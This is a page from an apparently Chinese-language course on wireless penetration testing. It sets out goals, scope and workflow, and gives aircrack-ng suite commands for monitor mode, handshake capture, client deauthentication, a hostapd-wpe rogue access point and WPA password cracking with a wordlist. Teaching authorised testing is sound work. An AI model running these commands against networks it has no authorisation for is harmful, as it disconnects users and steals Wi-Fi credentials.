课程进度 73% · 第8/10章第8/10章 · 标签 1/3
— 1 —
无线网络测试基础概念
无线网络测试是针对Wi-Fi、蓝牙等无线通信协议和设备进行安全性评估,发现无线环境中的加密、认证、隔离、信号覆盖等安全隐患。测试内容涵盖AP配置、加密协议、客户端安全、钓鱼攻击等多个层面。
- 目标:发现无线网络中的安全漏洞,防止未授权接入和数据泄露
- 范围:AP、客户端、无线协议、信号覆盖、隔离策略等
- 方法:信号嗅探+协议分析+攻击模拟+手工测试
bash
1
# 无线网卡监听模式
2
ifconfig wlan0 down
3
airmon-ng start wlan0
4
5
# 捕获握手包
6
airodump-ng wlan0mon -w handshake --write-interval 1
7
8
# 断开客户端
9
aireplay-ng -0 5 -a <AP_MAC> -c <CLIENT_MAC> wlan0mon
— 2 —
测试流程
- 环境准备:无线网卡、驱动、测试平台、信号分析工具
- 信号嗅探:扫描AP、客户端、信道、信号强度
- 协议分析:识别加密类型、认证方式、隔离策略
- 攻击模拟:钓鱼AP、握手包捕获、暴力破解、拒绝服务
- 漏洞验证:手动复现和确认无线漏洞
- 报告编写:整理漏洞细节和修复建议
bash
1
# 扫描AP和客户端
2
airodump-ng wlan0mon
3
4
# 钓鱼AP搭建
5
hostapd-wpe hostapd-wpe.conf
6
7
# WPA握手包破解
8
aircrack-ng -w rockyou.txt -b <AP_MAC> handshake.cap